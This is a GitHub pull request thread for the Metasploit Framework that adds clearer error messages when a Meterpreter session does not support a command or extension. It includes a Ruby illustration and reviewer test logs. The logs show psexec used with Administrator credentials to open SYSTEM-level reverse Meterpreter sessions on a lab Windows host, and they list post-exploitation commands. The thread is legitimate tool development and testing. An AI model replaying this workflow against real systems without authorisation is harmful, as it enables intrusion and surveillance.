Better Handling For Incompatible Meterpreter Extensions and Commands #14617

Merged: 9 commits, Feb 20, 2021

@zeroSteiner (Contributor) commented Jan 15, 2021

This requires rapid7/metasploit-payloads#451 to be landed first and the gem to be bumped.

This makes a number of changes to offer better handling for Meterpreter extensions and commands that are incompatible with a particular session. This for example will handle when the user attempts to migrate using a Python Meterpreter, or load the kiwi extension on the PHP Meterpreter. Currently in both of these cases, the user will get an error basically implying that Metasploit has no idea what that command or extension is. This could easily confuse someone less familiar with Metasploit that may not realize that migrate isn't supported on all Meterpreters, or that not all Meterpreters have the same extensions. With these changes in place, the user will get a more descriptive error message stating that the command[1] or extension is incompatible with the current session type (which is printed in the output to make our jobs easier when troubleshooting issues opened by users).

One of the major changes made to facilitate this is to enumerate the command IDs that are supported by the Meterpreter core since not all of them support all of the same core commands. With this in place, Metasploit is able to rely on Meterpreter informing it of which core commands it can handle and use that information to filter commands. This is a much better solution than the platform fingerprinting that is in place now. It is also how commands for extensions like stdapi are currently filtered. There's a good amount of code that was refactored in this PR to rely on the enumerated core commands instead of fingerprinting the platform which isn't super consistent.

This PR also updates the post/test/meterpreter module to incorporate a new test that ensures that the core command IDs can be enumerated as the extension ones can be.

[1] For a Meterpreter command to be reported as incompatible, the extension that provides it must have been loaded. For example, if a user attempts to run creds_all without loading kiwi, they'll still get an error that the command is unknown.

Testing

  • Start msfconsole and run loadpath test/modules to load the test modules
  • Use exploit/windows/smb/psexec and set the options to target a Windows system
  • Use the AutoRunScript option to automatically run post/test/meterpreter
  • Run it for both the 32-bit and 64-bit payloads, see no error messages
  • Open a Python / Java / PHP Meterpreter
  • See that Windows-specific commands and extensions are not available (commands: migrate, ssl_verify, etc.) (extensions: python, kiwi, powershell, etc.)
  • See that commands that are not supported do not appear in the help output and are not suggested for tab completion

Demo

In this example, the Python Meterpreter is used which lacks support for the migrate command and does not have the kiwi extension.

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.9.16-100.fc32.x86_64 #1 SMP Mon Dec 21 14:10:00 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > migrate 1234
[-] The "migrate" command is not supported by this Meterpreter type (python/linux)
meterpreter > thisCommandDoesNotExist
[-] Unknown command: thisCommandDoesNotExist.
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/linux)
meterpreter > load thisExtensionDoesNotExist
Loading extension thisextensiondoesnotexist...
[-] Failed to load extension: No module of the name thisextensiondoesnotexist found
meterpreter > 

Fixes #14610
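
The three outcomes this description distinguishes (supported, unsupported by the session type, unknown), modelled as an added Ruby example that is not code from this PR or from Metasploit. The class, its methods and the numeric command IDs are hypothetical and constructed; only the message strings follow the demo output above.

```ruby
require 'set'

# Added illustration: every name and numeric ID below is hypothetical/constructed,
# not Metasploit's real classes or command ID constants.
class SessionModel
  # Console-side command table: name => command IDs the remote side must implement.
  # An empty list means the command is handled entirely on the console side.
  CORE = { 'help' => [], 'machine_id' => [7], 'migrate' => [12] }.freeze
  # Commands contributed by extensions; registered only once the extension is loaded.
  EXTENSIONS = { 'kiwi' => { 'creds_all' => [2001] } }.freeze

  attr_reader :type

  # type:         session type string printed in error messages
  # reported_ids: core command IDs the session returned when asked to enumerate them
  # loadable:     extension name => IDs it reports once loaded, for extensions that
  #               have a build for this session type
  def initialize(type:, reported_ids:, loadable: {})
    @type = type
    @reported = reported_ids.to_set
    @loadable = loadable
    @commands = CORE.dup
  end

  # Distinguishes "no such extension anywhere" from "exists, but not for this type".
  def load_extension(name)
    name = name.downcase
    return [:unknown, "No module of the name #{name} found"] unless EXTENSIONS.key?(name)

    ids = @loadable[name]
    if ids.nil?
      return [:unsupported,
              "The \"#{name}\" extension is not supported by this Meterpreter type (#{type})"]
    end

    @reported.merge(ids)
    @commands = @commands.merge(EXTENSIONS[name])
    [:ok, nil]
  end

  # A command can only be reported as unsupported if the console knows it, which
  # for extension commands means the extension was loaded first (footnote [1]).
  def dispatch(name)
    required = @commands[name]
    return [:unknown, "Unknown command: #{name}."] if required.nil?
    return [:ok, nil] if supported?(required)

    [:unsupported, "The \"#{name}\" command is not supported by this Meterpreter type (#{type})"]
  end

  # What help output and tab completion would offer for this session.
  def visible_commands
    @commands.select { |_, required| supported?(required) }.keys.sort
  end

  private

  def supported?(required)
    required.all? { |id| @reported.include?(id) }
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed session: reports machine_id's ID but not migrate's, and has no kiwi build.
  session = SessionModel.new(type: 'python/linux', reported_ids: [7])
  %w[migrate thisCommandDoesNotExist creds_all].each do |cmd|
    status, message = session.dispatch(cmd)
    puts "#{cmd}: #{status} #{message}"
  end
  puts "load kiwi: #{session.load_extension('kiwi').inspect}"
  puts "visible: #{session.visible_commands.join(', ')}"
end
```
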

@zeroSteiner added the library, meterpreter, blocked (Blocked by one or more additional tasks) and usability (Usability improvements) labels Jan 15, 2021
Comment on lines 18 to +36
def self.get_extension_id(name)
k = self.get_extension_klass(name)
begin
k = self.get_extension_klass(name)
rescue RuntimeError
return nil
end

k.extension_id
end

def self.get_extension_name(id)
self.get_extension_names.each do |name|
self.get_extension_names.find do |name|
begin
klass = self.get_extension_klass(name)
rescue RuntimeError
next
end
return name if klass.extension_id == id

klass.extension_id == id
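Review bot: in get_extension_id, the `rescue RuntimeError` around `get_extension_klass(name)` turns every RuntimeError from that call into nil, so an unknown name and any other failure while resolving the class look identical to the caller; consider raising a dedicated error class for the unknown-name case and rescuing only that. The same rescue inside the `find` block of get_extension_name skips such names silently via `next`. Both methods now return nil for unknown input, which should be stated in their doc comments, and existing callers that relied on the previous exception or return value should be checked for nil handling.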
Contributor Author

These changes here update these two methods to both return nil when the ID or name is unknown. Previously id would raise a RuntimeError and name would return a list. This allows them to be used to easily query whether or not the ID and name are valid which I was doing while experimenting with some ways to suggest extensions. The get_extension_module and get_extension_klass methods both still raise RuntimeError when the name is invalid.

@zeroSteiner
Contributor Author

@msjenkins-r7 test this please.

@zeroSteiner
Contributor Author

I'm pretty sure that the sanity tests are failing because the required Windows Meterpreter binaries have not been included since the Windows side of things hasn't been merged yet.

@jmartin-tech
Contributor

@zeroSteiner, you are correct, the failure looks to be that old payloads are not compatible with this code. That suggests this is a breaking change for Windows Meterpreter at this time. The code either needs to be able to account for both payloads or we should increment the version to represent that existing payloads will fail.

@zeroSteiner
Contributor Author

As a work around, I can put all the platform fingerprinting code back in and leverage that when the enumextcmd command doesn't return anything for the core on Windows. Then later on we can just cut that code out once another major breaking change has been made. Windows was the only one that needed changes so everything will work for the other Meterpreters and we should still get the proper error handling.

@zeroSteiner
Contributor Author

Commit b4005de should fix that by clearing the command requirements when the platform is Windows.

@gwillcox-r7
Contributor

PR to incorporate the changes needed to test this is now up at #14665. Once this is landed the Delayed label should be able to be removed and testing of this PR can proceed.

@gwillcox-r7 removed the blocked (Blocked by one or more additional tasks) label Jan 29, 2021
@gwillcox-r7
Contributor

PR should be ready to be tested now, just needs to rebase with upstream to pull in the metasploit-payloads 2.0.28 gem.

@zeroSteiner force-pushed the feat/met/enum-core-ids branch 2 times, most recently from c6e1530 to cf24492, February 1, 2021 15:49
@gwillcox-r7 self-assigned this Feb 11, 2021
@gwillcox-r7
Contributor

Alright so some quick tests:

 ~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡91 *1 ?12  ./msfconsole                                ✔ │ 9s │ 2.7.2 Ruby 
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[!] The following modules could not be loaded!../
[!] 	/home/gwillcox/git/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/gwillcox/.msf4/logs/framework.log for details.
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.0.30-dev-953f4a41ba               ]
+ -- --=[ 2099 exploits - 1128 auxiliary - 358 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the 
last opened session

msf6 > loadpath test/modules
Loaded 36 modules:
    13 auxiliary modules
    13 exploit modules
    10 post modules
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.21.254.83
RHOSTS => 172.21.254.83
msf6 exploit(windows/smb/psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPASS *removed*
SMBPASS => *removed*
msf6 exploit(windows/smb/psexec) > set AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.21.254.83     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *removed*  no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] 172.21.254.83:445 - Connecting to the server...
[*] 172.21.254.83:445 - Authenticating to 172.21.254.83:445 as user 'Administrator'...
[*] 172.21.254.83:445 - Selecting PowerShell target
[*] 172.21.254.83:445 - Executing the payload...
[+] 172.21.254.83:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 172.21.254.83
[*] Meterpreter session 2 opened (172.21.242.117:4444 -> 172.21.254.83:59053) at 2021-02-11 11:03:50 -0600

meterpreter > 
[*] Session ID 2 (172.21.242.117:4444 -> 172.21.254.83:59053) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.254.83 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.21.254.83     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *removed*  no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] 172.21.254.83:445 - Connecting to the server...
[*] 172.21.254.83:445 - Authenticating to 172.21.254.83:445 as user 'Administrator'...
[*] 172.21.254.83:445 - Selecting PowerShell target
[*] 172.21.254.83:445 - Executing the payload...
[*] Sending stage (200262 bytes) to 172.21.254.83
[*] Meterpreter session 3 opened (172.21.242.117:4444 -> 172.21.254.83:59069) at 2021-02-11 11:04:42 -0600
[+] 172.21.254.83:445 - Service start timed out, OK if running a command or non-service executable...

meterpreter > 
[*] Session ID 3 (172.21.242.117:4444 -> 172.21.254.83:59069) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 3
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@gwillcox-r7 (Contributor) commented Feb 11, 2021

Quick test with Java which shows that it now recognizes that we don't support getpid or migrate in Java Meterpreter:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.21.254.83    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.21.254.83:4444
[*] Sending stage (58147 bytes) to 172.21.254.83
[*] Meterpreter session 5 opened (0.0.0.0:0 -> 172.21.254.83:4444) at 2021-02-11 11:24:43 -0600
[*] Session ID 5 (0.0.0.0:0 -> 172.21.254.83:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 5
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[*] Session doesn't implement getpid, skipping test
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 19; Failed: 0

meterpreter > getuid
Server username: Administrator
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                      Information                      Connection
  --  ----  ----                      -----------                      ----------
  5         meterpreter java/windows  Administrator @ WIN-QKA9JKS5MVU  0.0.0.0:0 -> 172.21.254.83:4444 (172.21.254.83)

msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/windows)
meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (java/windows)
meterpreter > 

@gwillcox-r7
Contributor

Gah looks like python/meterpreter/reverse_tcp on a Windows 10 host running Python 3.9.1 is failing to pass the tests right now:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > setg AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] Sending stage (39324 bytes) to 172.21.254.83
[*] Meterpreter session 6 opened (172.21.242.117:4444 -> 172.21.254.83:59753) at 2021-02-11 11:40:36 -0600
[*] Session ID 6 (172.21.242.117:4444 -> 172.21.254.83:59753) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 6
[*] Session type is meterpreter and platform is windows
[-] FAILED: should enumerate supported core commands
[-] FAILED: should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: Unknown error
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[-] Passed: 18; Failed: 2

meterpreter > 

@gwillcox-r7
Contributor

Also I don't know if this helps but r.e above this is what I get on the compromised user's console:

C:\Users\Administrator\Desktop>python test-reverse-tcp-python.py
File not found - meterpreter-test
File not found - meterpreter-test-moved
File not found - meterpreter-test
File not found - meterpreter-test
File not found - meterpreter-test-copied

@gwillcox-r7
Contributor

On the plus side it seems most of the usual commands are now being marked as not supported by Python:

meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (python/windows)
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/windows)
meterpreter > load python
Loading extension python...
[-] Failed to load extension: The "python" extension is not supported by this Meterpreter type (python/windows)
meterpreter > load powershell
Loading extension powershell...
[-] Failed to load extension: The "powershell" extension is not supported by this Meterpreter type (python/windows)
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reg           Modify and interact with the remote registry
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    idletime      Returns the number of seconds the remote user has been idle


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

meterpreter >

@gwillcox-r7 (Contributor) commented Feb 11, 2021

Quick confirmation that Java is working as expected minus the same potential case of ssl_verify coming up with unknown command vs unsupported.

meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (java/windows)
meterpreter > load python
Loading extension python...
[-] Failed to load extension: The "python" extension is not supported by this Meterpreter type (java/windows)
meterpreter > load powershell
Loading extension powershell...
[-] Failed to load extension: The "powershell" extension is not supported by this Meterpreter type (java/windows)
meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (java/windows)
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    keyevent      Send key events
    mouse         Send mouse events
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

meterpreter >

Edit: I did however see some oddities with machine_id here:

meterpreter > machine_id
[-] core_machine_id: Operation failed: 1
meterpreter > getuid
Server username: Administrator
meterpreter > 

@gwillcox-r7
Contributor

Gah also seeing some other errors here as well:

meterpreter > screenshot
[-] Error running command screenshot: Rex::RuntimeError Could not determine Windows build number to determine if taking a screenshot is safe.
meterpreter > 

@gwillcox-r7
Contributor

Also seem to have encountered a bug when trying to tab complete load entries now which seems to result in hung sessions:

meterpreter > load [-] Session manipulation failed: No such file or directory @ dir_initialize - /home/gwillcox/.msf4/payloads/meterpreter ["/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `open'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `entries'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `meterpreter_enum_ext'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:88:in `block in list_meterpreter_extensions'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `each'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `list_meterpreter_extensions'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `block in cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `map'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:455:in `tab_complete_helper'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:414:in `block in tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:388:in `tab_complete'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:69:in `block 
in init_tab_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/readline.rb:136:in `readline_attempted_completion_function'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6329:in `gen_completion_matches'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6813:in `rl_complete_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6903:in `rl_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4374:in `_rl_dispatch_subseq'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4363:in `_rl_dispatch'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4779:in `readline_internal_charloop'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4853:in `readline_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4875:in `readline'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:321:in `get_input_line'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:141:in `run'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1545:in `cmd_sessions'", 
